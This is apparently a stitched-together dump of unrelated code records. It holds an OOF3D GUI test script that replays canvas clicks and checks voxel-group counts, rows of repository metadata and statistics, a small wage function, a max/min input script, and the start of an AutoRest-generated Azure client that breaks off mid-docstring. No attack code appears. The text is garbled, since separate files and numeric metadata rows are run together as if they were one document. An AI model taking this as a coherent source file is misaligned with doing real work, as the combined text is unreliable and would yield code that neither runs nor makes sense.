canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 3.5900000000000e+02,y= 1.6100000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 3.2400000000000e+02,y= 1.9400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 3.2400000000000e+02,y= 1.9400000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:select').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.6500000000000e+02,y= 4.4600000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 1.6500000000000e+02,y= 4.4600000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 4.7000000000000e+02,y= 3.3600000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 4.7000000000000e+02,y= 3.3600000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 2.8600000000000e+02,y= 1.4000000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 2.8600000000000e+02,y= 1.4000000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
# create a voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:New').clicked()
checkpoint toplevel widget mapped Dialog-Create new voxel group
findWidget('Dialog-Create new voxel group').resize(246, 67)
findWidget('Dialog-Create new voxel group:gtk-ok').clicked()
findWidget('OOF3D:Microstructure Page:Pane').set_position(225)
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint OOF.PixelGroup.New
checkpoint microstructure page sensitized
checkpoint meshable button set
# A group has been created in micro, but no voxels have been added
assert tests.sensitization3()
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (0 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (0 voxels, meshable)')
# create another voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:New').clicked()
checkpoint toplevel widget mapped Dialog-Create new voxel group
findWidget('Dialog-Create new voxel group').resize(246, 67)
findWidget('Dialog-Create new voxel group:gtk-ok').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint OOF.PixelGroup.New
# another group has been created but still no added voxels
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (0 voxels, meshable)', 'pixelgroup<2> (0 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (0 voxels, meshable)')
# select the first created voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((0,))
# add the voxel selection the first create voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# do some more voxels selection
findWidget('OOF3D').resize(550, 350)
findWidget('OOF3D Graphics 1').resize(1000, 800)
findWidget('OOF3D').resize(550, 350)
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 2.6500000000000e+02,y= 4.1400000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 3.9300000000000e+02,y= 2.9400000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 3.9300000000000e+02,y= 2.9400000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:select').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.9300000000000e+02,y= 1.2800000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 1.9300000000000e+02,y= 1.2800000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 4.9800000000000e+02,y= 3.6600000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 4.9800000000000e+02,y= 3.6600000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 1.6400000000000e+02,y= 4.5300000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 1.6400000000000e+02,y= 4.5300000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
#Check that the current selected voxels group is not empty
assert tests.sensitization4()
# select the second voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((1,))
# now the current select voxels group has some voxels selection added
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (0 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (0 voxels, meshable)')
checkpoint microstructure page sensitized
assert tests.sensitization3()
# add the new selection to the select voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# now the two created voxels groups have some voxels selection added
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization4()
# undo the last added voxels
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBScroll:Voxel Selection:Undo').clicked()
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Undo
# there must be no effect after a undo
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization4()
# clear the whole selection
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBScroll:Voxel Selection:Clear').clicked()
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Clear
# there must be no effect after a clear
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization5()
# undo the clearing of the selection
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBScroll:Voxel Selection:Undo').clicked()
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Undo
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((0,))
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((1,))
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Remove').clicked()
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.RemoveSelection
# the remove delete all the voxels except the only one that was been undoed.
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (1 voxel, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (1 voxel, meshable)')
# add the current selection to the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# the add provide 50 vexels so the numbers are supposed to be back to before
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (3 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup<2> (6 voxels, meshable)')
assert tests.sensitization4()
# select the first voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:GroupListScroll:GroupList').get_selection().select_path((0,))
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Remove').clicked()
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.RemoveSelection
# another remove set the added voxels number to one as explained before
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (1 voxel, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (1 voxel, meshable)')
assert tests.sensitization4()
# clear the voxels selection in the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Clear').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.Clear
# the clear set definitely that number to 0
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (0 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (0 voxels, meshable)')
assert tests.sensitization3()
# add the current voxels selection to the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Introduction')
checkpoint page installed Introduction
findWidget('OOF3D:Navigation:Next').clicked()
checkpoint page installed Microstructure
findWidget('OOF3D:Navigation:Next').clicked()
checkpoint page installed Image
findWidget('OOF3D').resize(601, 350)
findWidget('OOF3D:Image Page:Pane').set_position(395)
findWidget('OOF3D:Navigation:Next').clicked()
checkpoint page installed Voxel Selection
findWidget('OOF3D:Voxel Selection Page:Pane').set_position(387)
checkpoint meshable button set
findWidget('OOF3D').resize(601, 350)
# add some selections to the current voxels group through the Voxel Selection Page
setComboBox(findWidget('OOF3D:Voxel Selection Page:Pane:SelectionModification:Method:Chooser'), 'Group')
findWidget('OOF3D:Voxel Selection Page:Pane').set_position(365)
findWidget('OOF3D:Voxel Selection Page:Pane:SelectionModification:OK').clicked()
checkpoint microstructure page sensitized
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.PixelSelection.Group
findWidget('OOF3D:Navigation:Prev').clicked()
checkpoint page installed Image
findWidget('OOF3D:Navigation:Prev').clicked()
checkpoint page installed Microstructure
findWidget('OOF3D:Microstructure Page:Pane').set_position(246)
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
checkpoint meshable button set
oldsize = window.setCanvasSize(614, 671)
# checking the voxels groups
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (5 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (5 voxels, meshable)')
assert tests.sensitization4()
# select other voxels
checkpoint microstructure page sensitized
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 3.1500000000000e+02,y= 1.3500000000000e+02,button=1,state=16,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.MOTION_NOTIFY,x= 2.8700000000000e+02,y= 2.8600000000000e+02,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 2.8700000000000e+02,y= 2.8600000000000e+02,button=1,state=272,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
checkpoint OOF.Graphics_1.Settings.Camera.View
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:select').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 5.2700000000000e+02,y= 4.3800000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 5.2700000000000e+02,y= 4.3800000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 5.5300000000000e+02,y= 2.2900000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 5.5300000000000e+02,y= 2.2900000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_PRESS,x= 3.8000000000000e+01,y= 3.3300000000000e+02,button=1,state=17,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
canvasobj.emit('event', event(gtk.gdk.BUTTON_RELEASE,x= 3.8000000000000e+01,y= 3.3300000000000e+02,button=1,state=273,window=findCanvasGdkWindow('Graphics_1')))
window.setCanvasSize(oldsize[0], oldsize[1])
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint OOF.Graphics_1.Toolbox.Pixel_Select.Point
# add the current voxels selection to the selected voxels group
findWidget('OOF3D:Microstructure Page:Pane:VoxelGroups:Add').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint OOF.PixelGroup.AddSelection
# checking the voxels groups
assert tests.meshableCheck(1)
assert tests.voxelGroupListCheck('pixelgroup (12 voxels, meshable)', 'pixelgroup<2> (6 voxels, meshable)')
assert tests.selectedGroupCheck('pixelgroup (12 voxels, meshable)')
assert tests.sensitization4()
# quit OOF3D
widget_0=findWidget('OOF3D')
handled_0=widget_0.event(event(gtk.gdk.DELETE,window=widget_0.window))
checkpoint toplevel widget mapped Questioner
postpone if not handled_0: widget_0.destroy()
findWidget('Questioner').resize(359, 91)
findWidget('Questioner:gtk-delete').clicked()
checkpoint OOF.Graphics_1.File.Close
| 57.296078 | 160 | 0.802231 | 3,749 | 29,221 | 6.198986 | 0.086156 | 0.063124 | 0.039759 | 0.067126 | 0.887091 | 0.868072 | 0.851033 | 0.830594 | 0.798451 | 0.783735 | 0 | 0.075166 | 0.084426 | 29,221 | 509 | 161 | 57.408644 | 0.793489 | 0.079258 | 0 | 0.781991 | 0 | 0 | 0.246975 | 0.050452 | 0 | 0 | 0 | 0 | 0.113744 | 0 | null | null | 0 | 0.00237 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43188a5ba9b808ea7d3ea4cc200b592c552a9eb7 | 102 | py | Python | modules/06/params.py | edsu/inst126 | a14f2c6901759f87b1f199f79ed1b8a5c03c688d | [
"CC-BY-4.0"
] | 2 | 2019-08-07T07:49:09.000Z | 2019-08-24T02:07:39.000Z | modules/06/params.py | edsu/inst126 | a14f2c6901759f87b1f199f79ed1b8a5c03c688d | [
"CC-BY-4.0"
] | 2 | 2020-07-18T02:43:50.000Z | 2022-02-10T19:04:57.000Z | modules/06/params.py | edsu/inst126 | a14f2c6901759f87b1f199f79ed1b8a5c03c688d | [
"CC-BY-4.0"
] | null | null | null | def compute_wages(hours=40, rate=15):
return hours * rate
print(compute_wages(hours=40, rate=20)) | 25.5 | 39 | 0.735294 | 17 | 102 | 4.294118 | 0.588235 | 0.328767 | 0.465753 | 0.520548 | 0.630137 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 0.127451 | 102 | 4 | 39 | 25.5 | 0.730337 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
432e0ce60b4062da6cb5c2b45b6f92b56e498699 | 756 | py | Python | 3.py | naman-1/python-practice-problems | 8e06c10cb4ad7d37d4cb8c27a277b54b29fe63c5 | [
"MIT"
] | null | null | null | 3.py | naman-1/python-practice-problems | 8e06c10cb4ad7d37d4cb8c27a277b54b29fe63c5 | [
"MIT"
] | null | null | null | 3.py | naman-1/python-practice-problems | 8e06c10cb4ad7d37d4cb8c27a277b54b29fe63c5 | [
"MIT"
] | null | null | null | #Input three numbers and display the largest / smallest number.
def max_min():
a=int(input('enter first number: '))
b=int(input('enter second number: '))
c=int(input('enter third number: '))
if a>b:
if a>c:
print('Largest number is: ',a)
print('smallest number is: ',c)
else:
print('Largest number is: ',c)
print('smallest number is: ',a)
elif b>c:
if a>c:
print('Largest number is: ',b)
print('smallest number is: ',c)
else:
print('Largest number is: ',b)
print('smallest number is: ',a)
else:
print('Largest number is: ',c)
print('smallest number is: ',a)
max_min()
| 756 | 756 | 0.51455 | 97 | 756 | 3.989691 | 0.257732 | 0.206718 | 0.232558 | 0.258398 | 0.604651 | 0.602067 | 0.602067 | 0.529716 | 0.529716 | 0.418605 | 0 | 0 | 0.349206 | 756 | 1 | 756 | 756 | 0.786585 | 0.973545 | 0 | 0.636364 | 0 | 0 | 0.369942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0 | 0 | 0.045455 | 0.454545 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
4a61bc6a7932ed5f66b6fb4dd7a47fef2a2abfe7 | 13,582 | py | Python | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/AzureParameterGrouping/fixtures/acceptancetestsazureparametergrouping/operations/parameter_grouping_operations.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 3 | 2018-03-20T22:36:32.000Z | 2021-07-15T02:36:51.000Z | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/AzureParameterGrouping/fixtures/acceptancetestsazureparametergrouping/operations/parameter_grouping_operations.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | null | null | null | src/generator/AutoRest.Python.Azure.Tests/Expected/AcceptanceTests/AzureParameterGrouping/fixtures/acceptancetestsazureparametergrouping/operations/parameter_grouping_operations.py | ljhljh235/AutoRest | b9ab4000e9b93d16925db84d08bafc225b098f8e | [
"MIT"
] | 1 | 2019-07-20T12:20:03.000Z | 2019-07-20T12:20:03.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
import uuid
from .. import models
class ParameterGroupingOperations(object):
"""ParameterGroupingOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def post_required(
self, parameter_grouping_post_required_parameters, custom_headers=None, raw=False, **operation_config):
"""Post a bunch of required parameters grouped.
